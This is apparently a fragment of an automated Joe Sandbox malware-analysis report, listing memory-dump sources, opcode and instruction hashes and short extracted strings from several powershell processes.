                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0c13bc4a6c0c4361e5c8b91a97122431cb657393fbe973336a36ab28b5aa7e03
                                                                                                                                                                                                                      • Instruction ID: 917079001a336b548c2331f4ae92e7244a2f18543b261da5fdb8822d5248a3c4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c13bc4a6c0c4361e5c8b91a97122431cb657393fbe973336a36ab28b5aa7e03
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CC012340497858BC7159F74D0988593F50AB0111471109DCD40B0F2B3C9768046DA01
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7c05a732ac0ff853a3f0d1f08f59bde69cc84eeab8eaea26f2393a345b9b3855
                                                                                                                                                                                                                      • Instruction ID: ee1ae8fb8afb32d6cb533f33c4eb136de6f315f8ac0047cdb619dabbd9220741
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c05a732ac0ff853a3f0d1f08f59bde69cc84eeab8eaea26f2393a345b9b3855
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EC0481914FBC49EE313A22548A0142AF311A4741438F02DACA84CFAA3D96E590ACB62
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4e47f4c6499d8b8774a1cbf836a3e369b67a3887cbda126f30c7a6c1acb5af13
                                                                                                                                                                                                                      • Instruction ID: 9deded3325c95f6e2c652d82d268a0b2cc50be3a253a3a983eb8387bb192fabf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e47f4c6499d8b8774a1cbf836a3e369b67a3887cbda126f30c7a6c1acb5af13
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9B0923104870D8FC2497F75E4488257329FB4021938008A8E90E0B3A2CE76E88ACA45
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: xo^$xo^$xo^$xo^$xo^$xo^$xo^$xo^$xo^
                                                                                                                                                                                                                      • API String ID: 0-874882724
                                                                                                                                                                                                                      • Opcode ID: 3cf87830c0b79c994e075ddee536b8a290dd8911da8cb78599072ae8f7f8b766
                                                                                                                                                                                                                      • Instruction ID: aec5743214c4c2d88bb509ef736fe69166802ef39a5955b359c636f9b073072a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cf87830c0b79c994e075ddee536b8a290dd8911da8cb78599072ae8f7f8b766
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49A1505251E3C15FD7079B3998E42803FB0AFA72A8B0E40E7C5D4DF1A7D914684AC7A7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-2306644927
                                                                                                                                                                                                                      • Opcode ID: 9cd9fa5f6988b1c141a0343c1c89017a1a1dde3cc9b5b7d2019629ae9ef1b70e
                                                                                                                                                                                                                      • Instruction ID: bd2cc7d5d6aba91f2a4801a4fba36ff732ef92e808b7160b3072ca0313c4bf43
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cd9fa5f6988b1c141a0343c1c89017a1a1dde3cc9b5b7d2019629ae9ef1b70e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23619CF0A1622EDFEB248E4CC544BAA77B2EB45341F1480D5F8089B290C771DD86EBA1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-3865595929
                                                                                                                                                                                                                      • Opcode ID: 53e92fba55f55be2ec3f0ba54cb2d92995ee565cf734a829c2a36eb9232a212d
                                                                                                                                                                                                                      • Instruction ID: 7843dc2c52a12596c36530e2520914f4c88961af619d2bda86bc7d9b6fad416b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53e92fba55f55be2ec3f0ba54cb2d92995ee565cf734a829c2a36eb9232a212d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73A158F17053258FE7249B68C80476ABBE2EFC6311F1484BAE54ECB391CA39C886D751
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$piTk$tP^q$tP^q
                                                                                                                                                                                                                      • API String ID: 0-3346979675
                                                                                                                                                                                                                      • Opcode ID: 708f28817fa31b76497c07850feed61517dd5d5b1ffc6dd4d2ed6bd722827400
                                                                                                                                                                                                                      • Instruction ID: c3d32cbd18e523c56b368fcb13b7b86837b26e2def051867127ceb37511b7245
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 708f28817fa31b76497c07850feed61517dd5d5b1ffc6dd4d2ed6bd722827400
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EBD126F5B0522E8FDB249B6C84006AABBE2EFC5311F1584FAD51DCB251DB31C886D791
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: fcq$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                      • API String ID: 0-2717029046
                                                                                                                                                                                                                      • Opcode ID: 3b08c8a9b114474464119322d8bee2740196068e00c3c2e99704d33ab89c4658
                                                                                                                                                                                                                      • Instruction ID: 4f4c0bb8e761eea575c201b3c15764ca9544c32839b125f119a63ed4afcc1751
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b08c8a9b114474464119322d8bee2740196068e00c3c2e99704d33ab89c4658
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7F179B17053258FE725AB6894147AABBA2EFC1311F14C4BBD50DCF252CB31D886D7A2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-3272787073
                                                                                                                                                                                                                      • Opcode ID: df59cbdfa857bde60597efd006a7ca2ed7a0fa5dfd01dc44f69f4a67e17b1461
                                                                                                                                                                                                                      • Instruction ID: ac494f58847111e95513745666b7946920d02a4eea6a182a9143144b2af2a473
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df59cbdfa857bde60597efd006a7ca2ed7a0fa5dfd01dc44f69f4a67e17b1461
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 795157F17053269BEB246A698404766BBE2EFC6311F1484BBC40DCF251DF39C886D792
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                                                                      • API String ID: 0-3297199963
                                                                                                                                                                                                                      • Opcode ID: ad19a19726a224c32ee4d05cf2eeac759cc7189e76e66edf9f9b52fb6038978a
                                                                                                                                                                                                                      • Instruction ID: 88c2aaf30559b99ab2a456bcb6df16b3cff91b6c39c8a960f73ebd5526840c89
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad19a19726a224c32ee4d05cf2eeac759cc7189e76e66edf9f9b52fb6038978a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7B1B374A003199FDB54DFA9D980A9DBBF2FF88301F14862AE819AB344D770A9458F90
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                                                                      • API String ID: 0-3297199963
                                                                                                                                                                                                                      • Opcode ID: 4fa15e4eafe84cf8bc1fa764d76c5206ca458f12ace5e50dcd89828df3db4569
                                                                                                                                                                                                                      • Instruction ID: af1f5128d4c5c03b05876cc2dfc034faf059bf7d4b11efd7e0eb2fbce768710e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fa15e4eafe84cf8bc1fa764d76c5206ca458f12ace5e50dcd89828df3db4569
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17B18574E003199FDB54DFA9D980A9DFBF2FF48301F14862AE819AB354DB70A9458F90
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-2125118731
                                                                                                                                                                                                                      • Opcode ID: 5f029cdc5e0aa83bc0a4bf89ced65d3d3d66dd9caa2b1a6aa0accda7ca02e52b
                                                                                                                                                                                                                      • Instruction ID: fc451fffc36c5342228590e57d612636bbc9ebd76b66e527bda2d95e348227d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f029cdc5e0aa83bc0a4bf89ced65d3d3d66dd9caa2b1a6aa0accda7ca02e52b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20215AF170132697FB3469298804B3777D69FC0711F2488AA990DCF385DDB1D8569361
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-2049395529
                                                                                                                                                                                                                      • Opcode ID: 708f5928bc848423ad1a56ef6a693471e3689832720f3e54bc9f1d2e713d0d0c
                                                                                                                                                                                                                      • Instruction ID: db84d01e928d38e785c9f8af90b31df0a08890459df851fcfccd171effbe6ac6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 708f5928bc848423ad1a56ef6a693471e3689832720f3e54bc9f1d2e713d0d0c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69017DA1B1D7668FC72E232C58202556FF25F87A41B1949E7C848CF797CE168C4E8397
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2361180305.00000000040BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 040BD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_40bd000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 09c68d6c8ba8c5cfbb7f7e3a9cf69bf296a481559ec800c72751fd6e827d215b
                                                                                                                                                                                                                      • Instruction ID: d18cc4e2797871657137bc7505dcca970e4124f6d40939ac30aaf578b64e05df
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09c68d6c8ba8c5cfbb7f7e3a9cf69bf296a481559ec800c72751fd6e827d215b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C501F7711057409AE7508E15EC84BA6FFD8DF51325F18C419ED8C1B242C679A841D6F5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2361180305.00000000040BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 040BD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_40bd000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 93fb235b60f23a1c2e7610d86a88092d48a686fcbc767ecf0ee63b3f08fc74db
                                                                                                                                                                                                                      • Instruction ID: e68d61af2c71a0fe088a7cec7d8920605ee6b9ee6c3e6c0043e095b1e317785e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93fb235b60f23a1c2e7610d86a88092d48a686fcbc767ecf0ee63b3f08fc74db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8801527200E3C09ED7128B25DC94B52BFB4DF53224F1980CBD9889F1A7C2695848D7B2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2361855237.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4240000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b24dbbe1f3160ec8d098a7a0b2fb682c60cc9f91cabe4624165855072928b211
                                                                                                                                                                                                                      • Instruction ID: 640e80e0c1bbd960799821239730feeecb6a74a4bdcc57f8fcd29e436ff48270
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b24dbbe1f3160ec8d098a7a0b2fb682c60cc9f91cabe4624165855072928b211
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36F0DA35A001059FCB15CF9DD890AEEF7B1FF88324F248159E515A72A1C736EC52CB60
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9014621a80432e1aef1cfcd6cad1c22f7962ec34cae45a630ca22aad9a09383f
                                                                                                                                                                                                                      • Instruction ID: 0ec570db7ba736e55a1f96b28ea9539a48643b7bead3a8dca3678891480f1028
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9014621a80432e1aef1cfcd6cad1c22f7962ec34cae45a630ca22aad9a09383f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97914F71F007159BDB1AEBB4C8146AFBBE3EF84604B04895DD14AAB340DF785D0A8BD6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4dfa822c9b15a89f8d1b87c5b18921321612c8b36f331b1f67d18b56778076de
                                                                                                                                                                                                                      • Instruction ID: dc1f613e4b2944ccdf397d27f6c2b8aeaea44f58b150e8fa4be75f20c7d2cbf0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dfa822c9b15a89f8d1b87c5b18921321612c8b36f331b1f67d18b56778076de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5913E71F007159BDB1AEBA4C8146AFB7E3EF84604B04895DD14AAB340DF786D0A8BD6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$piTk$piTk$piTk$piTk$piTk$|,Vk
                                                                                                                                                                                                                      • API String ID: 0-1171896915
                                                                                                                                                                                                                      • Opcode ID: c5a87d119b0f7dc3fd57bf608e8fbbce0c07fa31669351d0e701cb5f7907efd4
                                                                                                                                                                                                                      • Instruction ID: 5a1d1d5eaa983bd3858c79700f551d524c84af69eca3956e4d16131ffd7aaa66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5a87d119b0f7dc3fd57bf608e8fbbce0c07fa31669351d0e701cb5f7907efd4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E223AF1B00216DFEB249B6885417AFBBE5BF85351F0484BADA0DCB241DB31D945CBA2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                      • API String ID: 0-1420252700
                                                                                                                                                                                                                      • Opcode ID: b0a7aad1a5e8469ca19ce89b4ab5273966e2872708e8eb4938b400b0ba0cd775
                                                                                                                                                                                                                      • Instruction ID: 96fca62e4c5befe976911ddd52302cdb750ab9f4b8fb07431ff37bb3c27a7f3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0a7aad1a5e8469ca19ce89b4ab5273966e2872708e8eb4938b400b0ba0cd775
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A1267F17002559FEB258B68891077BBBE29FD1391F14887ADA09CB351DB32DC85C7A2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                                                                      • Opcode ID: a0beab8fcbfa2b6c39a7e23fc9434dbaff291345709a249ff0e9ec2de6b86812
                                                                                                                                                                                                                      • Instruction ID: 20019b911b9705c7d9c24933ec7bf9f91bd0536344eda4ae2bcfeca8103b5240
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0beab8fcbfa2b6c39a7e23fc9434dbaff291345709a249ff0e9ec2de6b86812
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19418F74B006148FDB05DF68C4A8AAEBBF2EF8D711F244498D406AB391DB35DC01CB60
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (&^q
                                                                                                                                                                                                                      • API String ID: 0-2067289071
                                                                                                                                                                                                                      • Opcode ID: 8b968d51e431af2c0f670e084c6aec20b6f5cc8993bc55d5ade4f1de444ea74e
                                                                                                                                                                                                                      • Instruction ID: b93e963fdea13b749f49e49223fb426bd5c0993a4553398e370a3a8f09940987
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b968d51e431af2c0f670e084c6aec20b6f5cc8993bc55d5ade4f1de444ea74e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1219A71A042588FCB15DBAED404A9EBFF6EB89320F24846AD119E7340CA759905CFA5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5d126be326ab4efdce831507317351e783eb36bc152f6574dbeae04b55417849
                                                                                                                                                                                                                      • Instruction ID: e52ba70edc9c58754ae5fe839769d99f950eb0d062a8d139ab3f08c247a01b7e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d126be326ab4efdce831507317351e783eb36bc152f6574dbeae04b55417849
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4918E74A002459FCB16CF59C898AAEFBF1FF48314B248699D815AB3A5C735FC51CBA0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: cc6ce3e5b8d85c34bb98eef44dd8dcd75141f5320af2b256325bd0ba4cc5e2aa
                                                                                                                                                                                                                      • Instruction ID: d9687443a77858b570c15e7ddd95f523e92c85a885aa11b2923dfb15c10c1449
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc6ce3e5b8d85c34bb98eef44dd8dcd75141f5320af2b256325bd0ba4cc5e2aa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1751CE703042159FE705DB69D854B3ABBEAFFC9255F2544AAD509CB351EB31EC02CBA0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c4913e72262fa6ed5fc91f564dd94bd2085268674eccdd623c0b10755525d949
                                                                                                                                                                                                                      • Instruction ID: 828ae3b2dbae62d78b6443cfd1f77d2bd25a5af8bfdb5614fbf3893190c76838
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4913e72262fa6ed5fc91f564dd94bd2085268674eccdd623c0b10755525d949
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4610771E00248DFCB15DFA9D584B9DBBF2EF88314F15816AE819AB354EB349C85CB60
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 67fc96010b543f97304139e909b38401acc74d6958122c1d59d7cc1064a72faf
                                                                                                                                                                                                                      • Instruction ID: 4893e9d34366084913147fc80a1112b0baffcfffdfd1266375dc286a4dee4531
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67fc96010b543f97304139e909b38401acc74d6958122c1d59d7cc1064a72faf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22511671E01248DFCB55DFA9C584B8DBBF2EF88314F15806AE819AB365EB349C45CB60
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 8686dd1cf34b6175dc5e61e73aa72c4a84f2044750dd34663cfd17e78f421bf7
                                                                                                                                                                                                                      • Instruction ID: f13aec3fb494f9b084e72341ac8479250d6b6374180bd8332c73018d3b06c059
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8686dd1cf34b6175dc5e61e73aa72c4a84f2044750dd34663cfd17e78f421bf7
